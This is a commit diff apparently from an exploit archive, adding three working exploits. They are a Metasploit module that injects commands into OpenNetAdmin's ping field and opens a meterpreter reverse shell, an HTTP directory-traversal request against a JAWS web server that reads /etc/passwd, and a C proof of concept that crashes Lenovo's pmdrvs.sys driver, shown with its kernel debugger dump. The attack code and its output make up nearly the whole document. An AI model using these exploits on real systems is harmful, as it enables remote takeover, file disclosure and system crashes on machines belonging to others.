DB: 2019-12-13
3 changes to exploits/shellcodes Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC) OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit) Bullwark Momentum Series JAWS 1.0 - Directory Traversal
This commit is contained in:
parent
6cf35b330f
commit
176ff0c251
4 changed files with 563 additions and 0 deletions
104
exploits/php/webapps/47772.rb
Executable file
104
exploits/php/webapps/47772.rb
Executable file
|
@ -0,0 +1,104 @@
|
||||||
|
class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Exploit::CmdStager
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'OpenNetAdmin Ping Command Injection',
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'mattpascoe', # Vulnerability discovery
|
||||||
|
'Onur ER <onur@onurer.net>' # Metasploit module
|
||||||
|
],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['EDB', '47691']
|
||||||
|
],
|
||||||
|
'DisclosureDate' => '2019-11-19',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'linux',
|
||||||
|
'Arch' => [ARCH_X86, ARCH_X64],
|
||||||
|
'Privileged' => false,
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
['Automatic Target', {}]
|
||||||
|
],
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'RPORT' => 80,
|
||||||
|
'payload' => 'linux/x86/meterpreter/reverse_tcp'
|
||||||
|
},
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('VHOST', [false, 'HTTP server virtual host']),
|
||||||
|
OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php'])
|
||||||
|
]
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path),
|
||||||
|
'ctype' => 'application/x-www-form-urlencoded',
|
||||||
|
'encode_params' => false,
|
||||||
|
'vars_post' => {
|
||||||
|
'xajax' => 'window_open',
|
||||||
|
'xajaxargs[]' => 'app_about'
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
unless res
|
||||||
|
vprint_error 'Connection failed'
|
||||||
|
return CheckCode::Unknown
|
||||||
|
end
|
||||||
|
|
||||||
|
unless res.body =~ /OpenNetAdmin/i
|
||||||
|
return CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
opennetadmin_version = res.body.scan(/OpenNetAdmin - v([\d\.]+)/).flatten.first
|
||||||
|
version = Gem::Version.new('opennetadmin_version')
|
||||||
|
|
||||||
|
if version
|
||||||
|
vprint_status "OpenNetAdmin version #{version}"
|
||||||
|
end
|
||||||
|
|
||||||
|
if version >= Gem::Version.new('8.5.14') && version <= Gem::Version.new('18.1.1')
|
||||||
|
return CheckCode::Appears
|
||||||
|
end
|
||||||
|
|
||||||
|
CheckCode::Detected
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
print_status('Exploiting...')
|
||||||
|
execute_cmdstager(flavor: :printf)
|
||||||
|
end
|
||||||
|
|
||||||
|
def filter_bad_chars(cmd)
|
||||||
|
cmd.gsub!(/chmod \+x/, 'chmod 777')
|
||||||
|
end
|
||||||
|
|
||||||
|
def execute_command(cmd, opts = {})
|
||||||
|
post_data = "xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;#{filter_bad_chars(cmd)};&xajaxargs[]=ping"
|
||||||
|
|
||||||
|
begin
|
||||||
|
send_request_cgi({
|
||||||
|
'method' => 'POST',
|
||||||
|
'uri' => normalize_uri(target_uri.path),
|
||||||
|
'ctype' => 'application/x-www-form-urlencoded',
|
||||||
|
'encode_params' => false,
|
||||||
|
'data' => post_data
|
||||||
|
})
|
||||||
|
rescue ::Rex::ConnectionError
|
||||||
|
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
21
exploits/php/webapps/47773.txt
Normal file
21
exploits/php/webapps/47773.txt
Normal file
|
@ -0,0 +1,21 @@
|
||||||
|
# Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal
|
||||||
|
# Date: 2019-12-11
|
||||||
|
# Author: Numan Türle
|
||||||
|
# Vendor Homepage: http://www.bullwark.net/
|
||||||
|
# Version : Bullwark Momentum Series Web Server JAWS/1.0
|
||||||
|
# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24
|
||||||
|
|
||||||
|
POC
|
||||||
|
---------
|
||||||
|
|
||||||
|
GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
|
||||||
|
Host: 12.0.0.1
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
Response
|
||||||
|
---------
|
||||||
|
|
||||||
|
root:ABgia2Z.lfFhA:0:0::/root:/bin/sh
|
435
exploits/windows/dos/47771.c
Normal file
435
exploits/windows/dos/47771.c
Normal file
|
@ -0,0 +1,435 @@
|
||||||
|
# Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)
|
||||||
|
# Date: 2019-12-11
|
||||||
|
# Exploit Author: Nassim Asrir
|
||||||
|
# CVE: CVE-2019-6192
|
||||||
|
# Tested On: Windows 10(64bit) | ThinkPad T470p
|
||||||
|
# Vendor : https://www.lenovo.com/us/en/
|
||||||
|
# Ref : https://support.lenovo.com/us/fr/solutions/len-29334
|
||||||
|
|
||||||
|
# Description
|
||||||
|
# A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver
|
||||||
|
# The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes
|
||||||
|
# Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.
|
||||||
|
|
||||||
|
# Exploit
|
||||||
|
|
||||||
|
#include <windows.h>
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <conio.h>
|
||||||
|
|
||||||
|
int main(int argc, char **argv)
|
||||||
|
{
|
||||||
|
HANDLE hDevice;
|
||||||
|
DWORD bret;
|
||||||
|
char szDevice[] = "\\\\.\\pmdrvs";
|
||||||
|
|
||||||
|
printf("--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\n");
|
||||||
|
|
||||||
|
printf("Opening handle to driver..\n");
|
||||||
|
|
||||||
|
if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) {
|
||||||
|
printf("Device %s succesfully opened!\n", szDevice);
|
||||||
|
printf("\tHandle: %p\n", hDevice);
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
printf("Error: Error opening device %s\n", szDevice);
|
||||||
|
}
|
||||||
|
|
||||||
|
printf("\nPress any key to DoS..");
|
||||||
|
_getch();
|
||||||
|
|
||||||
|
bret = 0;
|
||||||
|
|
||||||
|
if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL))
|
||||||
|
{
|
||||||
|
printf("DeviceIoControl Error - bytes returned %#x\n", bret);
|
||||||
|
}
|
||||||
|
|
||||||
|
CloseHandle(hDevice);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
# RCA
|
||||||
|
|
||||||
|
2: kd> !analyze -v
|
||||||
|
*******************************************************************************
|
||||||
|
* *
|
||||||
|
* Bugcheck Analysis *
|
||||||
|
* *
|
||||||
|
*******************************************************************************
|
||||||
|
|
||||||
|
SYSTEM_SERVICE_EXCEPTION (3b)
|
||||||
|
An exception happened while executing a system service routine.
|
||||||
|
Arguments:
|
||||||
|
Arg1: 00000000c0000005, Exception code that caused the bugcheck
|
||||||
|
Arg2: fffff80428bf109d, Address of the instruction which caused the bugcheck
|
||||||
|
Arg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck
|
||||||
|
Arg4: 0000000000000000, zero.
|
||||||
|
|
||||||
|
FAULTING_IP:
|
||||||
|
pmdrvs+109d
|
||||||
|
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi]
|
||||||
|
|
||||||
|
CONTEXT: ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50)
|
||||||
|
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
|
||||||
|
rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000
|
||||||
|
rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290
|
||||||
|
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
|
||||||
|
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
|
||||||
|
r14=0000000000000002 r15=0000000000000000
|
||||||
|
iopl=0 nv up ei pl zr na po nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246
|
||||||
|
pmdrvs+0x109d:
|
||||||
|
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????
|
||||||
|
Resetting default scope
|
||||||
|
|
||||||
|
CPU_COUNT: 8
|
||||||
|
|
||||||
|
CPU_MHZ: af8
|
||||||
|
|
||||||
|
CPU_VENDOR: GenuineIntel
|
||||||
|
|
||||||
|
CPU_FAMILY: 6
|
||||||
|
|
||||||
|
CPU_MODEL: 9e
|
||||||
|
|
||||||
|
CPU_STEPPING: 9
|
||||||
|
|
||||||
|
CPU_MICROCODE: 0,0,0,0 (F,M,S,R) SIG: 8E'00000000 (cache) 0'00000000 (init)
|
||||||
|
|
||||||
|
BLACKBOXBSD: 1 (!blackboxbsd)
|
||||||
|
|
||||||
|
|
||||||
|
BLACKBOXPNP: 1 (!blackboxpnp)
|
||||||
|
|
||||||
|
|
||||||
|
CURRENT_IRQL: 0
|
||||||
|
|
||||||
|
ANALYSIS_SESSION_HOST: LAPTOP-SP
|
||||||
|
|
||||||
|
ANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485
|
||||||
|
|
||||||
|
ANALYSIS_VERSION: 10.0.17763.132 amd64fre
|
||||||
|
|
||||||
|
LAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d
|
||||||
|
|
||||||
|
STACK_TEXT:
|
||||||
|
ffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d
|
||||||
|
ffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060
|
||||||
|
ffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59
|
||||||
|
ffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071
|
||||||
|
ffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc
|
||||||
|
ffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56
|
||||||
|
ffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925
|
||||||
|
00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844
|
||||||
|
|
||||||
|
|
||||||
|
THREAD_SHA1_HASH_MOD_FUNC: fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68
|
||||||
|
|
||||||
|
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb
|
||||||
|
|
||||||
|
THREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b
|
||||||
|
|
||||||
|
FOLLOWUP_IP:
|
||||||
|
pmdrvs+109d
|
||||||
|
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi]
|
||||||
|
|
||||||
|
FAULT_INSTR_CODE: 8941078b
|
||||||
|
|
||||||
|
SYMBOL_STACK_INDEX: 0
|
||||||
|
|
||||||
|
FOLLOWUP_NAME: MachineOwner
|
||||||
|
|
||||||
|
STACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb
|
||||||
|
|
||||||
|
BUGCHECK_STR: 2E8B5A19
|
||||||
|
|
||||||
|
EXCEPTION_CODE_STR: 2E8B5A19
|
||||||
|
|
||||||
|
EXCEPTION_STR: WRONG_SYMBOLS
|
||||||
|
|
||||||
|
PROCESS_NAME: ntoskrnl.wrong.symbols.exe
|
||||||
|
|
||||||
|
IMAGE_NAME: ntoskrnl.wrong.symbols.exe
|
||||||
|
|
||||||
|
MODULE_NAME: nt_wrong_symbols
|
||||||
|
|
||||||
|
SYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000
|
||||||
|
|
||||||
|
BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145
|
||||||
|
|
||||||
|
DEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145
|
||||||
|
|
||||||
|
PRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS
|
||||||
|
|
||||||
|
FAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000
|
||||||
|
|
||||||
|
TARGET_TIME: 2019-09-30T19:27:36.000Z
|
||||||
|
|
||||||
|
OSBUILD: 17763
|
||||||
|
|
||||||
|
OSSERVICEPACK: 0
|
||||||
|
|
||||||
|
SERVICEPACK_NUMBER: 0
|
||||||
|
|
||||||
|
OS_REVISION: 0
|
||||||
|
|
||||||
|
SUITE_MASK: 272
|
||||||
|
|
||||||
|
PRODUCT_TYPE: 1
|
||||||
|
|
||||||
|
OSPLATFORM_TYPE: x64
|
||||||
|
|
||||||
|
OSNAME: Windows 10
|
||||||
|
|
||||||
|
OSEDITION: Windows 10 WinNt TerminalServer SingleUserTS
|
||||||
|
|
||||||
|
OS_LOCALE:
|
||||||
|
|
||||||
|
USER_LCID: 0
|
||||||
|
|
||||||
|
OSBUILD_TIMESTAMP: 1994-09-30 01:21:45
|
||||||
|
|
||||||
|
BUILDDATESTAMP_STR: 180914-1434
|
||||||
|
|
||||||
|
BUILDLAB_STR: rs5_release
|
||||||
|
|
||||||
|
BUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434
|
||||||
|
|
||||||
|
ANALYSIS_SESSION_ELAPSED_TIME: ae
|
||||||
|
|
||||||
|
ANALYSIS_SOURCE: KM
|
||||||
|
|
||||||
|
FAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000
|
||||||
|
|
||||||
|
FAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1}
|
||||||
|
|
||||||
|
Followup: MachineOwner
|
||||||
|
---------
|
||||||
|
|
||||||
|
2: kd> u fffff804`28bf109d
|
||||||
|
pmdrvs+0x109d:
|
||||||
|
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi]
|
||||||
|
fffff804`28bf109f 41894308 mov dword ptr [r11+8],eax
|
||||||
|
fffff804`28bf10a3 e858ffffff call pmdrvs+0x1000 (fffff804`28bf1000)
|
||||||
|
fffff804`28bf10a8 85c0 test eax,eax
|
||||||
|
fffff804`28bf10aa 0f8582000000 jne pmdrvs+0x1132 (fffff804`28bf1132)
|
||||||
|
fffff804`28bf10b0 488b8c2498000000 mov rcx,qword ptr [rsp+98h]
|
||||||
|
fffff804`28bf10b8 4885c9 test rcx,rcx
|
||||||
|
fffff804`28bf10bb 7475 je pmdrvs+0x1132 (fffff804`28bf1132)
|
||||||
|
2: kd> !for_each_frame .frame /r @$Frame
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
|
||||||
|
00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
|
||||||
|
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
|
||||||
|
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
|
||||||
|
rip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10
|
||||||
|
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
|
||||||
|
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
|
||||||
|
r14=0000000000000000 r15=ffffc709dee8f408
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
nt!KeBugCheckEx:
|
||||||
|
fffff804`1f269040 48894c2408 mov qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09
|
||||||
|
01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09
|
||||||
|
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
|
||||||
|
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
|
||||||
|
rip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10
|
||||||
|
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
|
||||||
|
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
|
||||||
|
r14=0000000000000000 r15=ffffc709dee8f408
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
nt!setjmpex+0x7f09:
|
||||||
|
fffff804`1f27a8e9 90 nop
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c
|
||||||
|
02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c
|
||||||
|
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
|
||||||
|
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
|
||||||
|
rip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10
|
||||||
|
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
|
||||||
|
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
|
||||||
|
r14=0000000000000000 r15=ffffc709dee8f408
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
nt!setjmpex+0x735c:
|
||||||
|
fffff804`1f279d3c b801000000 mov eax,1
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f
|
||||||
|
03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f
|
||||||
|
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
|
||||||
|
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
|
||||||
|
rip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10
|
||||||
|
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
|
||||||
|
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
|
||||||
|
r14=0000000000000000 r15=ffffc709dee8f408
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
nt!_chkstk+0x41f:
|
||||||
|
fffff804`1f271b4f 0f1f00 nop dword ptr [rax]
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440
|
||||||
|
04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440
|
||||||
|
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
|
||||||
|
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
|
||||||
|
rip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10
|
||||||
|
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
|
||||||
|
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
|
||||||
|
r14=0000000000000000 r15=ffffc709dee8f408
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
nt!RtlUnwindEx+0x3440:
|
||||||
|
fffff804`1f1ca460 8bd0 mov edx,eax
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264
|
||||||
|
05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264
|
||||||
|
rax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b
|
||||||
|
rdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000
|
||||||
|
rip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150
|
||||||
|
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
|
||||||
|
r11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40
|
||||||
|
r14=ffffc709dee8f4b0 r15=0000000000000000
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
nt!ExReleaseAutoExpandPushLockExclusive+0x264:
|
||||||
|
fffff804`1f0d7c24 84c0 test al,al
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2
|
||||||
|
06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2
|
||||||
|
rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b
|
||||||
|
rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000
|
||||||
|
rip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530
|
||||||
|
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
|
||||||
|
r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40
|
||||||
|
r14=0000000000000002 r15=0000000000000000
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
nt!setjmpex+0x7fe2:
|
||||||
|
fffff804`1f27a9c2 488d8c2400010000 lea rcx,[rsp+100h]
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce
|
||||||
|
07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce
|
||||||
|
rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b
|
||||||
|
rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000
|
||||||
|
rip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530
|
||||||
|
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
|
||||||
|
r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40
|
||||||
|
r14=0000000000000002 r15=0000000000000000
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
nt!setjmpex+0x42ce:
|
||||||
|
fffff804`1f276cae 440f20c0 mov rax,cr8
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d
|
||||||
|
08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d
|
||||||
|
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
|
||||||
|
rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000
|
||||||
|
rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290
|
||||||
|
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
|
||||||
|
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
|
||||||
|
r14=0000000000000002 r15=0000000000000000
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
pmdrvs+0x109d:
|
||||||
|
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060
|
||||||
|
09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060
|
||||||
|
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
|
||||||
|
rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000
|
||||||
|
rip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290
|
||||||
|
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
|
||||||
|
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
|
||||||
|
r14=0000000000000002 r15=0000000000000000
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
pmdrvs+0x5060:
|
||||||
|
fffff804`28bf5060 eb28 jmp pmdrvs+0x508a (fffff804`28bf508a)
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59
|
||||||
|
0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59
|
||||||
|
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
|
||||||
|
rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290
|
||||||
|
rip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290
|
||||||
|
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
|
||||||
|
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
|
||||||
|
r14=0000000000000002 r15=0000000000000000
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
nt!IofCallDriver+0x59:
|
||||||
|
fffff804`1f12dba9 4883c438 add rsp,38h
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071
|
||||||
|
0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071
|
||||||
|
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
|
||||||
|
rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290
|
||||||
|
